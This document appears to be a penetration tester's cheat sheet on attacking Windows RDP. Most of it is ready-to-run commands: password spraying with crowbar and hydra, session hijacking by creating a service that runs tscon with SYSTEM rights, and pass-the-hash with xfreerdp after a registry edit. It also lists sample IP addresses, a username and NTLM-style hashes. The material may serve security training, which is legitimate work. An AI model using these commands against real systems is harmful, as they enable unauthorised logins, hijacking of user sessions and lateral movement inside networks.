<aside> 💡

One caveat on password guessing against Windows instances is that you should consider the client's password policy. In many cases, a user account will be locked or disabled after a certain number of failed login attempts. In this case, we can perform a specific password guessing technique called Password Spraying. This technique works by attempting a single password for many usernames before trying another password, being careful to avoid account lockout.

</aside>

Using the Crowbar tool, we can perform a password spraying attack against the RDP service.

crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

rdesktop -u admin -p password123 192.168.2.143

RDP Session Hijacking

To successfully impersonate a user without their password, we need to have SYSTEM privileges and use the Microsoft tscon.exe binary that enables users to connect to another desktop session. It works by specifying which SESSION ID (4 for the lewen session in our example) we would like to connect to which session name (rdp-tcp#13, which is our current session).

 tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

A simple trick is to create a Windows service that, by default, will run as Local System and will execute any binary with SYSTEM privileges. We will use Microsoft sc.exe binary. First, we specify the service name (sessionhijack) and the binpath, which is the command we want to execute. Once we run the following command, a service named sessionhijack will be created.

whoami
query user
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
#To run command
net start sessionhijack

RDP Pass-the-Hash (PtH)

There are a few caveats to this attack:

**#Adding the DisableRestrictedAdmin Registry Key**
reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9

Administrator:0E14B9D6330BF16C30B1924111104824

Administrator